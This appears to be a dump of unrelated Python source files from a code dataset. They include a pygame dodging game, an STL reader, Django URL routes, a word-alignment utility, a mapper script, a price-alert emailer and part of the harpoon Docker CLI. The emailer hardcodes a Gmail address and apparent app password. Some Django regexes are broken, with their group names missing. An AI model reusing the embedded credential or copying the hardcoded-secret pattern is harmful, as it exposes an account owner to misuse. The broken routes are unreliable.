DERECHO\n elif xPersonaje + anchoPersonaje >= xEnemigo2 and xPersonaje <= xEnemigo2 + anchoEnemigo2 and yPersonaje + altPersonaje >= yEnemigo2 and yPersonaje <= yEnemigo2 + altEnemigo2:\n listaEnemigos2.remove(enemigo2) #Colisionaron\n return True\n\n\n#Dibuja el menú cuando acaba el juego\ndef dibujarMenuFinal(ventana, imgBotonSalir, imgHome, imgIntento2, tiempo):\n ventana.blit(imgHome, (ANCHO - 120, ALTO - 100))\n ventana.blit(imgBotonSalir, (ANCHO // 2 - 110, ALTO//3 + 75))\n ventana.blit(tiempo, (ANCHO//2-250, 100))\n ventana.blit(imgIntento2, (ANCHO-220, ALTO-80))\n\n\n#Verifica si agarró el bonus el usuario\ndef agregarBonus(spriteBonus, spritePersonaje):\n xPersonaje, yPersonaje, anchoPersonaje, altoPersonaje = spritePersonaje.rect\n xBonus, yBonus, anchoBonus, altoBonus = spriteBonus.rect\n #Hace la condición de que agarre el bonus\n if xPersonaje >= xBonus and xPersonaje <= xBonus+anchoBonus and yPersonaje+altoPersonaje >= yBonus and yPersonaje <= yBonus+altoBonus:\n spriteBonus.remove()\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(0, ALTO) / 100 + 0.5) * 100\n return True\n # Hace la condición de que agarre el bonus\n elif xPersonaje+anchoPersonaje >= xBonus and xPersonaje <= xBonus+anchoBonus and yPersonaje+altoPersonaje >= yBonus and yPersonaje <= yBonus+altoBonus:\n spriteBonus.remove()\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(0, ALTO) / 100 + 0.5) * 100\n return True\n else:\n pass\n\n\n#Le paso todos los archivos para después utilizarlos\ndef dibujar():\n pygame.init() #Inicializa el motor de pygame\n ventana = pygame.display.set_mode((ANCHO, ALTO)) #Crea la ventana donde dibujará, Crea una ventana de ANCHO x ALTO\n reloj = pygame.time.Clock() #Para limitar los frames por segundo\n termina = False #Condición para que siga el juego, si es True, termina\n\n\n #Carga al personaje\n imgPersonaje = pygame.image.load(\"Conejo.png\")\n spritePersonaje = pygame.sprite.Sprite()\n spritePersonaje.image = imgPersonaje\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 340\n spritePersonaje.rect.bottom = 300\n #ALTO//2 + spritePersonaje.rect.height//2\n\n #Carga a los enemigos\n listaEnemigos = []\n imgEnemigo = pygame.image.load(\"CazadorIzquierda.png\")\n for k in range(5): #Genera 5 enemigos\n spriteEnemigo = pygame.sprite.Sprite()\n spriteEnemigo.image = imgEnemigo\n spriteEnemigo.rect = imgEnemigo.get_rect()\n spriteEnemigo.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos.append(spriteEnemigo) #Mete a los enemigos a la lista\n\n listaEnemigos2 = []\n imgEnemigo2 = pygame.image.load(\"CazadorDerecha.png\")\n for i in range(5): #Genera 5 enemigos\n spriteEnemigo2 = pygame.sprite.Sprite()\n spriteEnemigo2.image = imgEnemigo2\n spriteEnemigo2.rect = imgEnemigo2.get_rect()\n spriteEnemigo2.rect.left = randint(0, ANCHO) - ANCHO\n spriteEnemigo2.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos2.append(spriteEnemigo2) #Mete a los enemigos a la lista\n\n\n #Cargar obstáculos\n imgObstaculo = pygame.image.load(\"arbol.png\")\n spriteObstaculo = pygame.sprite.Sprite()\n spriteObstaculo.image = imgObstaculo\n spriteObstaculo.rect = imgObstaculo.get_rect()\n spriteObstaculo.rect.left = randint(70,ANCHO-70)\n spriteObstaculo.rect.bottom = int(randint(80,ALTO-80)/100+0.5) * 100\n\n #Cargar bonus\n imgBonus = pygame.image.load(\"BonoZanahoria.png\")\n spriteBonus = pygame.sprite.Sprite()\n spriteBonus.image = imgBonus\n spriteBonus.rect = imgBonus.get_rect()\n spriteBonus.rect.left = randint(80,ANCHO-80)\n spriteBonus.rect.bottom = int(randint(80,ALTO-80)/100+0.5) * 100\n\n #Fondos\n imgFondoInicio = pygame.image.load(\"imgFondo1.jpg\")\n imgFondoJugando = pygame.image.load(\"imgFondo2.jpg\")\n imgFondoFinal = pygame.image.load(\"imgFondo3.jpg\")\n\n #Menú\n imgBotonJugar = pygame.image.load(\"jugar.png\")\n imgBotonSalir = pygame.image.load(\"salir.png\")\n imgHighscore = pygame.image.load(\"Highscores.png\")\n\n #Menú final\n imgHome = pygame.image.load(\"home.png\")\n imgIntento2 = pygame.image.load(\"intentar.png\")\n\n #Estado incial\n estado = MENU\n\n #Tiempo\n timer = 0 #Acumulador de tiempo de regeneración enemigos\n nuevoTiempo = 0 #Acumulador de puntuación\n\n #Fuente de texto\n fuente = pygame.font.SysFont(\"monospace\", 64)\n\n #Carga la música\n pygame.mixer.init()\n pygame.mixer.music.load(\"musicaFondo.mp3\")\n pygame.mixer.music.play(-1)\n efectoSonido = pygame.mixer.Sound(\"sonidoConejo.wav\")\n\n\n while not termina: # Ciclo principal, Mientras la variable termina sea False, el ciclo se repite automáticamente\n # Procesa los eventos que recibe\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT: # El usuario hizo click en el botón de salir\n termina = True # Queremos terminar el ciclo\n\n #Estado jugando\n elif estado == JUGANDO and evento.type == pygame.KEYDOWN:\n xPersonaje, yPersonaje, anchoPersonaje, altoPersonaje = spritePersonaje.rect\n xObstaculo, yObstaculo, anchoObstaculo, altoObstaculo = spriteObstaculo.rect\n if evento.key == pygame.K_UP:\n #Hace cumplir que no pase por el obstáculo\n if xPersonaje >= xObstaculo-anchoPersonaje and xPersonaje <= xObstaculo+anchoObstaculo and yPersonaje-altoPersonaje*2 <= yObstaculo and yPersonaje >= yObstaculo+altoObstaculo:\n pass\n elif yPersonaje-altoPersonaje <= 0:\n pass\n else:\n spritePersonaje.rect.bottom -= 100\n elif evento.key == pygame.K_DOWN:\n # Hace cumplir que no pase por el obstáculo\n if xPersonaje >= xObstaculo-anchoPersonaje and xPersonaje <= xObstaculo+anchoObstaculo and yPersonaje+altoPersonaje*2 >= yObstaculo and yPersonaje <= yObstaculo:\n pass\n elif yPersonaje+altoPersonaje >= ALTO:\n pass\n else:\n spritePersonaje.rect.bottom += 100\n elif evento.key == pygame.K_RIGHT:\n # Hace cumplir que no pase por el obstáculo\n if xPersonaje+anchoPersonaje*2 >= xObstaculo and xPersonaje+anchoPersonaje <= xObstaculo+anchoObstaculo and yPersonaje+altoPersonaje >= yObstaculo and yPersonaje <= yObstaculo:\n pass\n elif xPersonaje+anchoPersonaje*2 >= ANCHO:\n pass\n else:\n spritePersonaje.rect.left += 65\n elif evento.key == pygame.K_LEFT:\n # Hace cumplir que no pase por el obstáculo\n if xPersonaje+anchoPersonaje >= xObstaculo and xPersonaje-anchoPersonaje*2 <= xObstaculo+anchoObstaculo and yPersonaje+altoPersonaje >= yObstaculo and yPersonaje <= yObstaculo:\n pass\n elif xPersonaje-anchoPersonaje*2 <= -49:\n pass\n else:\n spritePersonaje.rect.left -= 65\n\n\n elif estado == PUNTAJES and evento.type == pygame.MOUSEBUTTONUP:\n xMouse, yMouse = pygame.mouse.get_pos() # Captura las coordenadas en las que hiciste click\n xHome = ANCHO - 120\n yHome = ALTO - 100\n xIntentar = ANCHO - 220\n yIntentar = ALTO - 80\n #Condición si el usuario hace click en home\n if xMouse >= xHome and xMouse <= xHome + 120 and yMouse >= yHome and yMouse <= yHome + 100: # Condicion para el boton\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n estado = MENU\n #Condición si hace click en salir\n elif xMouse >= 0 and xMouse <= 221 and yMouse >= ALTO-100 and yMouse <= ALTO:\n termina = True\n #Condición si hace click en reintentar\n elif xMouse >= xIntentar and xMouse <= xIntentar + ANCHO - 220 and yMouse >= yIntentar and yMouse <= yIntentar + ALTO - 80:\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n estado = JUGANDO\n\n\n #Probar botones del botón final\n elif estado == FINAL and evento.type == pygame.MOUSEBUTTONUP:\n xMouse, yMouse = pygame.mouse.get_pos() # Captura las coordenadas en las que hiciste click\n # Preguntar si solto el mouse dentro del boton de home\n xHome = ANCHO - 120\n yHome = ALTO - 100\n xBotonSalir = ANCHO//2 - 110\n yBotonSalir = ALTO//3 + 75\n xIntentar = ANCHO - 220\n yIntentar = ALTO - 80\n #Condición para establecer el juego en 0\n if xMouse >= xHome and xMouse <= xHome + 120 and yMouse >= yHome and yMouse <= yHome + 100: # Condicion para el boton\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO-80)\n spriteBonus.rect.bottom = int(randint(80, ALTO-80) / 100 + 0.5) * 100\n estado = MENU\n # Condición para click en botón salir\n elif xMouse >= xBotonSalir and xMouse <= xBotonSalir+221 and yMouse >= yBotonSalir and yMouse <= yBotonSalir +100:\n termina = True\n # Condición para establecer el juego en 0\n elif xMouse >= xIntentar and xMouse <= xIntentar+ANCHO-220 and yMouse >= yIntentar and yMouse <= yIntentar+ALTO-80:\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(80, ALTO-80) / 100 + 0.5) * 100\n estado = JUGANDO\n\n #Estado menú\n elif estado == MENU and evento.type == pygame.MOUSEBUTTONUP:\n xMouse, yMouse = pygame.mouse.get_pos() #Captura las coordenadas en las que hiciste click\n # Preguntar si solto el mouse dentro del boton\n xBoton = ANCHO//2-110\n yBoton = ALTO//3-50\n xBotonSalir = ANCHO//2-110\n yBotonSalir = ALTO//3+100\n xBotonPuntajes = ANCHO//2-110\n yBotonPuntajes = ALTO-160\n #Condición si hace click en jugar\n if xMouse >= xBoton and xMouse <= xBoton+220 and yMouse >= yBoton and yMouse <= yBoton+100: #Condicion para el boton\n estado = JUGANDO\n #Condición si hace click en salir\n elif xMouse >= xBotonSalir and xMouse <= xBotonSalir+220 and yMouse >= yBotonSalir and yMouse <= yBotonSalir+100:\n termina = True\n #Condición si hace click en highscore\n elif xMouse >= xBotonPuntajes and xMouse <= xBotonPuntajes+220 and yMouse >= yBotonPuntajes and yMouse <= yBotonPuntajes+100:\n estado = PUNTAJES\n\n\n #Estado jugando\n if estado == JUGANDO:\n ventana.blit(imgFondoJugando, (0, 0))\n #Tiempo real\n nuevoTiempo += 1 / 40\n #Tiempo de regeneración\n timer += 1 / 40\n #Ciclo para que se generen los cazadores\n if timer >= 1:\n timer = 0\n\n #Carga los enemigos\n spriteEnemigo = pygame.sprite.Sprite()\n spriteEnemigo.image = imgEnemigo\n spriteEnemigo.rect = imgEnemigo.get_rect()\n spriteEnemigo.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos.append(spriteEnemigo)\n\n spriteEnemigo2 = pygame.sprite.Sprite()\n spriteEnemigo2.image = imgEnemigo2\n spriteEnemigo2.rect = imgEnemigo2.get_rect()\n spriteEnemigo2.rect.left = -randint(0, ANCHO) - ANCHO\n spriteEnemigo2.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos2.append(spriteEnemigo2)\n\n moverEnemigos(listaEnemigos,listaEnemigos2)\n dibujarPersonaje(ventana, spritePersonaje)\n dibujarEnemigos(ventana, listaEnemigos, listaEnemigos2)\n dibujarObstaculo(ventana, spriteObstaculo)\n #Imprime el tiempo\n texto = fuente.render(\"Tiempo %d\" % int(nuevoTiempo), 1, ROJO)\n ventana.blit(texto, (ANCHO // 2 + 90, 20))\n #Verifica si chocaron\n if verificarColision(listaEnemigos, listaEnemigos2, spritePersonaje) == True:\n efectoSonido.play()\n estado = FINAL\n #Verifica si agarró el bonus\n elif agregarBonus(spriteBonus,spritePersonaje) == True:\n nuevoTiempo = nuevoTiempo+2\n #Genera el bonus\n elif nuevoTiempo >= 5 or nuevoTiempo >= 10 or nuevoTiempo >= 15:\n dibujarBonus(ventana, spriteBonus)\n\n #Estado de menú principal\n elif estado == MENU:\n ventana.blit(imgFondoInicio, (0,0))\n dibujarMenu(ventana, imgBotonJugar, imgBotonSalir, imgHighscore)\n\n #Estado de highscore\n elif estado == PUNTAJES:\n ventana.blit(imgFondoInicio,(0,0))\n ventana.blit(imgHome, (ANCHO - 120, ALTO - 100))\n ventana.blit(imgBotonSalir, (0, ALTO -100))\n ventana.blit(imgIntento2, (ANCHO - 220, ALTO - 80))\n\n #Se lee el archivo que contiene el puntaje anterior\n puntajeAnterior = open(\"Puntajes.txt\", \"r\")\n primerLinea = puntajeAnterior.readline()\n puntaje = str(primerLinea)\n score = fuente.render(\"Mejor puntaje: %s segundos\" % puntaje, 1, ROJO)\n ventana.blit(score, (100,ALTO//2))\n puntajeAnterior.close()\n\n\n #Estado de menú final\n elif estado == FINAL:\n ventana.blit(imgFondoFinal, (0,0))\n tiempo = fuente.render(str(\"Tu puntuación es: %d\" % int(nuevoTiempo)), 1, ROJO)\n dibujarMenuFinal(ventana, imgBotonSalir, imgHome, imgIntento2,tiempo)\n\n #Leo el archivo donde esta el puntaje anterior\n puntajeAnterior = open(\"Puntajes.txt\", \"r\")\n primerLinea = puntajeAnterior.readline()\n puntaje = int(primerLinea)\n puntajeActual = nuevoTiempo // 1\n #Comparo si el actual es mayor que el anterior\n if puntajeActual > puntaje:\n mejorScore = open(\"Puntajes.txt\", \"w\")\n mejorScore.write(\"%d\" % puntajeActual)\n mejorScore.close()\n puntajeAnterior.close()\n\n\n pygame.display.flip() # Actualiza trazos (Si no llamas a esta función, no se dibuja)\n reloj.tick(40) # 40 frames por segundo\n\n # Después del ciclo principal\n pygame.quit() # termina pygame\n\n# Función principal, aquí resuelves el problema\ndef main():\n dibujar()\n\n# Llamas a la función principal\nmain()","sub_path":"Juego.py","file_name":"Juego.py","file_ext":"py","file_size_in_byte":21016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"439153172","text":"\n\ndef readData(file_path):\n file=open(file_path)\n vertexs=[]\n vnorms=[]\n line=file.readline()\n while line:\n line=line.split()\n if line[0]=='facet':\n vnorms.append(list(map(float,[line[2],line[3],line[4]])))\n if line[0]=='vertex':\n vertexs.append(list(map(float,[line[1],line[2],line[3]])))\n line=file.readline()\n file.close()\n return vertexs,vnorms\n\n\nif __name__ == \"__main__\":\n vertexs, vnorms=readData('gear.stl')\n print(vertexs[0][0])","sub_path":"system/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"358439761","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import *\nfrom django.views.generic import *\n\nfrom consultas.views import *\n\nurlpatterns = (\n url(r'atestado/(?P\\d+)/$', atestado),\n url(r'encaminhamento/(?P\\d+)/$', encaminhamento),\n url(r'evolucao/(?P\\d+)/$', evolucao),\n url(r'gestantes/$', gestantes, name=\"gestantes\"),\n url(r'prescricao/(?P\\d+)/$', prescricao),\n url(r'producao_mensal/$', producao_mensal, name=\"producao_mensal\"),\n url(r'producao_diaria/$', producao_diaria, name=\"producao_diaria\"),\n url(r'solicitacao/(?P\\d+)/$', solicitacao),\n url(r'complemento/(?P\\d+)/$', get_complemento),\n url(r'profissional/$', get_profissional),\n url(r'procedimento/$', get_procedimento),\n url(r'solicitacaoModelo/$', solicitacaoModelo),\n url(r'prescricaoModelo/$', prescricaoModelo),\n url(r'medicacao/(?P\\d+)/$', get_medicacao),\n)\n","sub_path":"consultas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"62437874","text":"import sys\nimport math\nfrom collections import deque\nimport editdistance\nimport pandas as pd\n\n\ndef _print_table(tbl, m, n):\n for i in range(0, m + 1):\n for j in range(0, n + 1):\n sys.stdout.write(\"%s/%s\" % tbl[(i, j)])\n sys.stdout.write('\\t')\n sys.stdout.write('\\n')\n\n\ndef _edit_distance(tokens1, tokens2, weight_fns):\n tbl = {}\n tbl[(0, 0)] = (0, 'n')\n\n m = len(tokens1)\n n = len(tokens2)\n\n for i in range(0, m):\n tbl[(i + 1, 0)] = (i + 1, 'd')\n \n for j in range(0, n):\n tbl[(0, j + 1)] = (j + 1, 'i')\n\n if m == 0 or n == 0:\n return tbl\n\n for i in range(0, m):\n for j in range(0, n):\n if (tokens1[i] == tokens2[j]):\n edit_cost = tbl[(i + 1, j + 1)] = (tbl[(i, j)][0], 'n')\n else:\n edit_cost = (tbl[(i, j)][0] + weight_fns['e'](tokens1[i], tokens2[j]), 'e')\n insert_cost = (tbl[(i, j + 1)][0] + weight_fns['d'](tokens1[i]), 'd')\n delete_cost = (tbl[(i + 1, j)][0] + weight_fns['i'](tokens2[j]), 'i')\n # print(tokens1[i])\n # print(tokens2[j])\n # print(f'e: {edit_cost}\\ni: {insert_cost}\\nd: {delete_cost}')\n # print()\n tbl[(i + 1, j + 1)] = min([insert_cost, delete_cost, edit_cost], key = lambda t: t[0])\n\n return tbl\n\n\ndef case_aware_editdistance(x,y):\n basic = editdistance.eval(x, y)\n case_insensitive = editdistance.eval(x.lower(), y.lower())\n if basic > case_insensitive:\n return case_insensitive+((basic-case_insensitive)*0.001)\n else:\n return basic\n\n\n\ndef _gen_alignments(tokens1, tokens2):\n weight_fns = {\n 'e': lambda x, y: (case_aware_editdistance(x, y) * 2 / max(len(x), len (y)) ) ,\n # 'e': lambda x, y: (editdistance.eval(x, y) * 2 / max(len(x), len (y)) ) ,\n 'd': lambda x: 1,\n 'i': lambda x: 1\n }\n\n dist_table = _edit_distance(tokens1, tokens2, weight_fns)\n \n m = len(tokens1)\n n = len(tokens2)\n\n alignments = deque()\n\n i = m\n j = n\n\n while i != 0 or j != 0:\n op = dist_table[(i, j)][1]\n cost = dist_table[(i, j)][0]\n\n if op == 'n' or op == 'e':\n alignments.appendleft((i, j, op, cost))\n i -= 1\n j -= 1\n \n elif op == 'i':\n alignments.appendleft((None, j, 'i', cost))\n j -= 1\n\n elif op == 'd':\n alignments.appendleft((i, None, 'd', cost))\n i -= 1\n\n return alignments\n\n\ndef align_words(s1, s2):\n s1_tokens = s1.split()\n s2_tokens = s2.split()\n\n alignments = _gen_alignments(s1_tokens, s2_tokens)\n\n return list(alignments)\n\ndef align_wordsDF(s1,s2,blanks='_',bckf=True):\n \n # print(s1)\n # print(s2)\n \n s1toks = s1.split()\n s2toks = s2.split()\n a = align_words(s1,s2)\n\n \n \n df = {}\n for tidx in range(len(a)):\n s1idx = a[tidx][0]\n s2idx = a[tidx][1]\n\n if s1idx:\n s1tok = s1toks[s1idx-1]\n else:\n s1tok = blanks\n\n if s2idx:\n s2tok = s2toks[s2idx-1]\n else:\n if bckf==True:\n s2tok=s1toks[s1idx-1]\n elif bckf==False:\n s2tok = blanks\n else:\n raise Exception('backoff must be True or False')\n df[tidx] = (s1tok,s2tok,a[tidx][2],a[tidx][3])\n # print(f'{tidx}\\t{s1tok}\\t{s2tok}\\t{a[tidx][2]}')\n return pd.DataFrame(df).T\n\n\ndef cross_align(s1,s2,blanks='_',bckf=True):\n return ' '.join(align_wordsDF(s1,s2,blanks=blanks,bckf=bckf)[1].values)","sub_path":"src/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"328472691","text":"#!/usr/bin/python\n\nimport sys\nimport string\n\nsubjectIdentifier = \"Subject: \"\n\nfor line in sys.stdin:\n\tif line.startswith(subjectIdentifier):\n\t\tline = line.replace(subjectIdentifier, \"\")\n\t\twords = line.split()\n\t\tfor word in words:\n\t\t\tword = word.strip(string.punctuation).strip()\n\t\t\tif len(word) > 0:\n\t\t\t\tprint(word.lower().strip())","sub_path":"mapper_2.py","file_name":"mapper_2.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"121047661","text":"import smtplib\nimport json\n\naccounts_path = './data/accounts.json'\n\ndef get_target_account(email):\n target_account = None\n with open(accounts_path, \"r+\") as f:\n accounts = json.load(f)\n for account in accounts:\n if account[\"email\"] == email:\n target_account = account\n break\n if target_account == None:\n accounts.append({'email': email, 'notified_products_urls': []})\n f.seek(0)\n json.dump(accounts, f)\n f.truncate()\n target_account = accounts[-1]\n\n return target_account\n\n\ndef update_accounts_json(email, urls):\n with open(accounts_path, \"r+\") as f:\n accounts = json.load(f)\n for account in accounts:\n if account[\"email\"] == email:\n account[\"notified_products_urls\"] = account[\"notified_products_urls\"] + urls\n break\n f.seek(0)\n json.dump(accounts, f)\n f.truncate()\n\n\ndef update_urls_to_send(urls_to_send, urls, target_account):\n for url in urls:\n if url not in target_account['notified_products_urls']:\n urls_to_send.append(url)\n\n\ndef send_mail(urls, email):\n urls_to_send = []\n target_account = get_target_account(email)\n update_urls_to_send(urls_to_send, urls, target_account)\n\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('throwaway.47192883@gmail.com', 'oqyriwifawroqvvv')\n subject = 'price fell down'\n body = 'check the amazon links:' + \" \".join(urls_to_send)\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n if len(urls_to_send) > 0:\n server.sendmail(\n 'originjdel@gmail.com',\n email,\n msg\n )\n update_accounts_json(email, urls_to_send)\n\n print(f'Hey, {len(urls_to_send)} emails have been sent')\n\n server.quit()\n","sub_path":"src/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"308983158","text":"\"\"\"\nThis is where the mainline sits and is responsible for setting up the logging,\nthe argument parsing and for starting up Harpoon.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom harpoon.errors import BadOption, BadDockerConnection\nfrom harpoon.overview import Overview\n\nfrom rainbow_logging_handler import RainbowLoggingHandler\nfrom input_algorithms.spec_base import NotSpecified\nfrom docker.client import Client as DockerClient\nfrom delfick_error import DelfickError\nimport requests\nimport argparse\nimport logging\nimport docker\nimport ssl\nimport sys\nimport os\n\nlog = logging.getLogger(\"harpoon.executor\")\n\ndef setup_logging(verbose=False, silent=False, debug=False):\n log = logging.getLogger(\"\")\n handler = RainbowLoggingHandler(sys.stderr)\n handler._column_color['%(asctime)s'] = ('cyan', None, False)\n handler._column_color['%(levelname)-7s'] = ('green', None, False)\n handler._column_color['%(message)s'][logging.INFO] = ('blue', None, False)\n handler.setFormatter(logging.Formatter(\"%(asctime)s %(levelname)-7s %(name)-15s %(message)s\"))\n log.addHandler(handler)\n log.setLevel([logging.INFO, logging.DEBUG][verbose or debug])\n if silent:\n log.setLevel(logging.ERROR)\n\n logging.getLogger(\"requests\").setLevel([logging.CRITICAL, logging.ERROR][verbose or debug])\n return handler\n\nclass CliParser(object):\n \"\"\"Knows what argv looks like\"\"\"\n def parse_args(self, argv=None):\n \"\"\"Split the args into -- and run through our argparse.ArgumentParser\"\"\"\n if argv is None:\n argv = sys.argv[1:]\n\n argv = list(argv)\n args = []\n extras = None\n default_task = NotSpecified\n default_image = NotSpecified\n\n if argv:\n if not argv[0].startswith(\"-\"):\n default_task = argv[0]\n argv.pop(0)\n\n if argv and not argv[0].startswith(\"-\"):\n default_image = argv[0]\n argv.pop(0)\n\n while argv:\n nxt = argv.pop(0)\n if extras is not None:\n extras.append(nxt)\n elif nxt == \"--\":\n extras = []\n else:\n args.append(nxt)\n\n other_args = \"\"\n if extras:\n other_args = \" \".join(extras)\n\n parser = self.make_parser(default_task=default_task, default_image=default_image)\n args = parser.parse_args(args)\n if default_task is not NotSpecified and args.harpoon_chosen_task != default_task:\n raise BadOption(\"Please don't specify task as a positional argument and as a --task option\", positional=default_task, kwarg=args.task)\n if default_image is not NotSpecified and args.harpoon_chosen_image != default_image:\n raise BadOption(\"Please don't specify image as a positional argument and as a --image option\", positional=default_image, kwargs=args.image)\n\n return args, other_args\n\n def make_parser(self, default_task=NotSpecified, default_image=NotSpecified):\n parser = argparse.ArgumentParser(description=\"Opinionated layer around docker\")\n\n logging = parser.add_mutually_exclusive_group()\n logging.add_argument(\"--verbose\"\n , help = \"Enable debug logging\"\n , action = \"store_true\"\n )\n\n logging.add_argument(\"--silent\"\n , help = \"Only log errors\"\n , action = \"store_true\"\n )\n\n logging.add_argument(\"--debug\"\n , help = \"Debug logs\"\n , action = \"store_true\"\n )\n\n opts = {}\n if os.path.exists(\"./harpoon.yml\"):\n opts[\"default\"] = \"./harpoon.yml\"\n opts[\"required\"] = False\n else:\n opts[\"required\"] = True\n\n if \"HARPOON_CONFIG\" in os.environ:\n opts[\"default\"] = os.environ[\"HARPOON_CONFIG\"]\n del opts[\"required\"]\n parser.add_argument(\"--harpoon-config\"\n , help = \"The config file specifying what harpoon should care about\"\n , type = argparse.FileType(\"r\")\n , **opts\n )\n\n extra = {\"default\": \"list_tasks\"}\n if default_task is not NotSpecified:\n extra[\"default\"] = default_task\n parser.add_argument(\"--task\"\n , help = \"The task to run\"\n , dest = \"harpoon_chosen_task\"\n , **extra\n )\n\n parser.add_argument(\"--non-interactive\"\n , help = \"Make this non interactive\"\n , dest = \"harpoon_interactive\"\n , action = \"store_false\"\n )\n\n extra = {\"default\": \"\"}\n if default_image is not NotSpecified:\n extra[\"default\"] = default_image\n parser.add_argument(\"--image\"\n , help = \"Specify a particular image\"\n , dest = \"harpoon_chosen_image\"\n , **extra\n )\n\n command = parser.add_mutually_exclusive_group()\n\n command.add_argument(\"--command\"\n , help = \"Specify a command to run for tasks that need one\"\n )\n\n command.add_argument(\"--bash\"\n , help = \"Specify a command that will be ran as /bin/bash -c ''\"\n )\n\n parser.add_argument(\"--silent-build\"\n , help = \"Make the build process quiet\"\n , dest = \"harpoon_silent_build\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--keep-replaced\"\n , help = \"Don't delete images that have their tag stolen by a new image\"\n , dest = \"harpoon_keep_replaced\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--no-intervention\"\n , help = \"Don't ask to intervene broken builds\"\n , dest = \"harpoon_no_intervention\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--env\"\n , help = \"Environment option to start the container with\"\n , dest = \"extra_env\"\n , action = \"append\"\n )\n\n parser.add_argument(\"--port\"\n , help = \"Specify a port to publish in the running container you make\"\n , dest = \"extra_ports\"\n , action = \"append\"\n )\n\n parser.add_argument(\"--flat\"\n , help = \"Used with the show command\"\n , dest = \"harpoon_flat\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--ignore-missing\"\n , help = \"Used by the pull commands to ignore if an image doesn't exist\"\n , dest = \"harpoon_ignore_missing\"\n , action = \"store_true\"\n )\n\n return parser\n\n def interpret_args(self, argv, no_docker=False):\n \"\"\"Parse argv, do some transformation and return cli_args suitable for Overview\"\"\"\n args, extra = CliParser().parse_args(argv)\n\n cli_args = {\"harpoon\": {}}\n for key, val in sorted(vars(args).items()):\n if key.startswith(\"harpoon_\"):\n cli_args[\"harpoon\"][key[8:]] = val\n else:\n cli_args[key] = val\n cli_args[\"harpoon\"][\"extra\"] = extra\n\n if not no_docker:\n cli_args[\"harpoon\"][\"docker_context\"] = docker_context()\n\n for key in ('bash', 'command'):\n if cli_args[key] is None:\n cli_args[key] = NotSpecified\n\n return args, cli_args\n\ndef docker_context():\n \"\"\"Make a docker context\"\"\"\n host = os.environ.get('DOCKER_HOST')\n cert_path = os.environ.get('DOCKER_CERT_PATH')\n tls_verify = os.environ.get('DOCKER_TLS_VERIFY')\n\n options = {\"timeout\": 60}\n if host:\n options['base_url'] = (host.replace('tcp://', 'https://') if tls_verify else host)\n\n if tls_verify and cert_path:\n options['tls'] = docker.tls.TLSConfig(\n verify = True\n , ca_cert = os.path.join(cert_path, 'ca.pem')\n , client_cert = (os.path.join(cert_path, 'cert.pem'), os.path.join(cert_path, 'key.pem'))\n , ssl_version = ssl.PROTOCOL_TLSv1\n , assert_hostname = False\n )\n\n client = DockerClient(**options)\n try:\n info 